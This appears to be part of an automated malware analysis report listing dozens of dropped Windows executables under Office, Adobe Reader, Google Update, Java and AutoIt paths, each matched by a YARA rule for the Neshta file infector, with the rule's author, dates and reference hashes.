                  Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
